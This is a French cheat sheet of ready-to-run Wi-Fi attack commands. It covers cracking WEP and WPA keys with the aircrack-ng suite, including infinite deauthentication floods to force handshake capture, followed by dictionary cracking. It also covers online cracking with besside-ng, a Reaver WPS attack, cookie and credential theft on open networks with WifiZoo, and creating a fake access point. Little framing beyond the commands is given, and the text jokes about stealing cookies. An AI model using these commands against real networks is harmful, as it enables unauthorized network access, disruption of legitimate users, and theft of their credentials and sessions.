Wifi
Tester si le driver de la carte wifi supporte l'injection de packets
#aireplay-ng -9 mon0 21:15:52 Trying broadcast probe requests... 21:15:52 Injection is working! 21:15:53 Found 4 APs
AirCrack - WEP
Dans un terminal:
Airmon-ng start [interface] Airodump-ng [interface] Airodump-ng --channel [channel cible] --write wep --bssid [BSSID cible] [interface] **Attention la commande tourné
Dan un nouveau terminal:
Aireplay-ng -1 0 -a [BSSID cible] [interface] Attention wait for the recognize router :-)
Dans un nouveau terminal:
Aireplay-ng -3 -b [BSSID cible] [interface] **Attention not close this terminal **
Dans un nouveau terminal:
Aircrack-ng wep-01.cap
AirCrack - WPA
Passer la carte wifi en mode monitor (créee une nouvelle interface mon0)
#airmon-ng start wlan0
Ecouter le réseau en mode WPA
#airodump-ng --encrypt wpa mon0
Cibler un SSID précis (-c channel d'écoute, --bssid le point d'accès, -w fichier de sortie, --ignore-negative-one à utiliser sur toutes les commandes en cas du bug airodump channel: -1)
#airodump-ng -w out --encrypt wpa -c 1 --bssid 00:1F:9F:BB:AF:05 --ignore-negative-one mon0
Pour réussir un crack wpa, il est primordial qu'une station soit connectée, en effet le 4 way handshake (littéralement la poignée de mains) nécessaire au crack ne peut etre capturé QUE si une station est connectée au point d'accès.
Préparez votre attaque aireplay-ng. Ouvrir deux nouveaux shells. Dans le premier, préparez la commande
#aireplay-ng -0 0 -a $bssid -c $station --ignore-negative-one mon0
Dans le second, préparez la commande
#aireplay-ng -0 0 -a $bssid --ignore-negative-one mon0
Le paramètre -0 signifie une attaque déauth, le 0 qui suit signifie que l'envoi des paquets de déauth sera infini, il faudra donc arrêter l'attaque après quelques instants avec ctrl + c. Vous pouvez spécifier un délai, par exemple aireplay-ng -0 5 , et l'attaque s'arrêtera après l'envoi de 5 paquets de déauth. Quand les commandes sont prêtes, lancez les dans chaque shell, patientez quelques secondes et stoppez les.
Si l'attaque a réussi, vous devriez avoir une bonne surprise en revenant dans votre shell airodump-ng. L'apparition du WPA handshake en haut à droite de la fenetre indique la réussite de l'attaque. Cela varie suivant la qualité du signal reçu.
Le handshake est maintenant dans le fichier de capture, vous pouvez stopper airodump. Vous devez maintenant vous armer d'un bon fichier dictionnaire. Le crack peut commencer:
#aircrack-ng -w nom-du-fichier-dictionnaire nom-du-fichier-de-capture
"-w -" si on n'a pas de dictionnaire
AirCrack - Divers
Attaquer un réseau Wifi et cracker la clef online
besside-ng -s wpa.darkircop.org mon0
Reaver
#reaver -i mon0 -b ${BSSID} -vv
WifiZoo
Télécharger ici
WifiZoo est un outil permettant de récupérer des cookies sur des réseaux wifi non encryptés (opn), ainsi que diverses autres informations intéressantes: POP3 Credentials, FTP Datas, MSN Datas, SMTP Datas. Le résultat du sniffing d'informations est affiché sur une interface web. La réutilisation des cookies est d'une facilité déconcertante, puisque Wifizoo intègre un serveur proxy spécialement dédié à la réutilisation des cookies que le programme va lui meme forger automatiquement.
Penser à modifier le fichier wifizoo.py est changer la variable "conf.iface = 'wlan0'" par sa carte wifi.
Lancer wifizoo:
#python wifizoo.py -i wlan0
On peut voir que wifizoo lance l'interface web sur le port 8000 du serveur local, et le proxy est accessible sur le port 8080. S'y connecter avec firefox: 127.0.0.1:8000 Puis clic-clic bouton pour voler les cookies :)
Créer un faux point d'accès
airbase-ng -c "${WIFI_CHANNEL}" -e "${ESSID_NAME}" "${WNIC_NAME}"